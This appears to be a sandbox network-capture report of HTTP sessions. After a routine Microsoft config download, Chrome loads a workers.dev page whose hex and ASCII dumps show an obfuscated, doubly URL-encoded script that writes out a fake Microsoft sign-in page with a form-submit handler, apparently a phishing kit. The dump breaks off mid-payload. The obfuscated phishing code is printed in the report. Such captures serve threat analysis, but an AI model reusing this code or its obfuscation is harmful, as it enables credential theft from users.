                                  Content-Type: application/octet-stream
                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                  Server: ECAcc (chd/079C)
                                  X-CID: 11
                                  X-Ms-ApiVersion: Distribute 1.2
                                  X-Ms-Region: prod-eus2-z1
                                  Cache-Control: public, max-age=28175
                                  Date: Wed, 17 Apr 2024 23:13:14 GMT
                                  Connection: close
                                  X-CID: 2


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.44975423.201.212.130443
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:14 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  Accept-Encoding: identity
                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                  Range: bytes=0-2147483646
                                  User-Agent: Microsoft BITS/7.8
                                  Host: fs.microsoft.com
                                  2024-04-17 23:13:15 UTC530INHTTP/1.1 200 OK
                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                  Content-Type: application/octet-stream
                                  ApiVersion: Distribute 1.1
                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                  X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                  Cache-Control: public, max-age=28217
                                  Date: Wed, 17 Apr 2024 23:13:15 GMT
                                  Content-Length: 55
                                  Connection: close
                                  X-CID: 2
                                  2024-04-17 23:13:15 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.449760104.21.50.1034433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:26 UTC712OUTGET / HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:26 UTC552INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:26 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVRAdTaAR9jNEHQUMAX744mKcSykVMASUtP6gc2v1h5qK5jvXdNXRHFm66PQG6vwZ3l%2BC%2FHbQ0KERpMntuh9wMh1VNljlij1MUSFT2SSIRcLNWOvZb%2BR%2FbK81q3tHs27tHMisisXbAM%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601b0d391d452c-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:26 UTC817INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:26 UTC1369INData Raw: 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25 32 35 32 30 69 6e 70 75 74 25 32 35
                                  Data Ascii: %253B%250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%2520input%25
                                  2024-04-17 23:13:26 UTC1369INData Raw: 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25
                                  Data Ascii: 0A%2520%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%2520display%
                                  2024-04-17 23:13:26 UTC1369INData Raw: 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32
                                  Data Ascii: %2520display%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253A%2520none%2
                                  2024-04-17 23:13:26 UTC1369INData Raw: 25 32 35 32 32 66 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35
                                  Data Ascii: %2522formal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%2520%2520%25
                                  2024-04-17 23:13:26 UTC1369INData Raw: 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25
                                  Data Ascii: 250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%
                                  2024-04-17 23:13:26 UTC1369INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35 32 30 6f 70 74 69 6f 6e 25 32 35 33
                                  Data Ascii: 0%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%2520option%253
                                  2024-04-17 23:13:26 UTC1369INData Raw: 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32
                                  Data Ascii: 7%2529%250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520%2520%2520%2
                                  2024-04-17 23:13:26 UTC1369INData Raw: 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 35 32 30 25 32 35
                                  Data Ascii: 0A%2520%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opacity%2520%25
                                  2024-04-17 23:13:26 UTC1369INData Raw: 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35
                                  Data Ascii: 20%2520%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%2520%2520%25


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.449761104.21.50.1034433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:26 UTC550OUTGET /style.css HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: text/css,*/*;q=0.1
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: style
                                  Referer: https://nsjw.newf.workers.dev/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:26 UTC550INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:26 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJKptMmqhlmmkUgpkxcoUItmuMeghemugrPWvttlmZzhVr9Rbsou5%2BfZ4xw0vDejOjfEoq7o%2BmIIV%2FEdBZxpwgXEz09JR1Tyvy7xSNzs2pCtqlWIZ7lEhHpFus7h7tbroaG8wcmwchg%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601b0e0f2cb0af-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:26 UTC819INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:26 UTC1369INData Raw: 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25 32 35 32 30 69 6e 70 75 74 25 32 35 37 42
                                  Data Ascii: 53B%250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%2520input%257B
                                  2024-04-17 23:13:26 UTC1369INData Raw: 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35
                                  Data Ascii: %2520%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%2520display%25
                                  2024-04-17 23:13:26 UTC1369INData Raw: 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33
                                  Data Ascii: 520display%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253A%2520none%253
                                  2024-04-17 23:13:26 UTC1369INData Raw: 35 32 32 66 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30
                                  Data Ascii: 522formal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%2520%2520%2520
                                  2024-04-17 23:13:26 UTC1369INData Raw: 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35
                                  Data Ascii: 0A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%25
                                  2024-04-17 23:13:26 UTC1369INData Raw: 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35 32 30 6f 70 74 69 6f 6e 25 32 35 33 43 2f
